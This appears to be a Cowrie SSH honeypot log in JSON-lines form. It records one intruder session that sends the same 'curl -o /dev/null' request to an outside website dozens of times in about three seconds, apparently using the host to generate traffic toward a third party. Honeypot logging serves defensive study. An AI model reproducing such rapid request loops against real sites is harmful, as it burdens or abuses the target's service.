{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.869235Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.908700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.909671Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.950432Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.951373Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:58.988688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:58.989686Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.032821Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.033749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.074565Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.075550Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.112125Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.113065Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.154052Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.154959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.192379Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.193436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.230579Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.231740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.268895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.269773Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.306860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.307828Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.344871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.346047Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.387259Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.388260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.427894Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.428870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.467891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.468762Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.505770Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.506731Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.545572Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.546465Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.583393Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.584262Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.622848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.623691Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.662692Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.663889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.710193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.711149Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.748607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.749536Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.787327Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.788531Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.828888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.829767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.869897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.870851Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.909383Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.910278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.948337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.949227Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:59.986290Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:59.987247Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.026752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.027659Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.068019Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.069140Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.107364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.109169Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.150054Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.151042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.188413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.189590Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.228234Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.229550Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.266883Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.267899Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.307602Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.308664Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.349145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.350406Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.387959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.388989Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.430838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.431844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.472009Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.472995Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.510096Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.511029Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.548821Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.549787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.587205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.588254Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.627644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.628627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.665501Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.666740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.710574Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.711594Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.748706Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.749721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.787454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.788722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.827675Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.828721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.866206Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.867242Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.905652Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.906618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.945042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.946082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:00.983965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:00.985003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.027417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.028986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.066542Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.067645Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.110935Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.112277Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.149490Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.150543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.189800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.190899Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.294839Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.296571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.333673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.334763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.373984Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.375102Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.412062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.413242Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.453873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.454906Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.493500Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.494539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
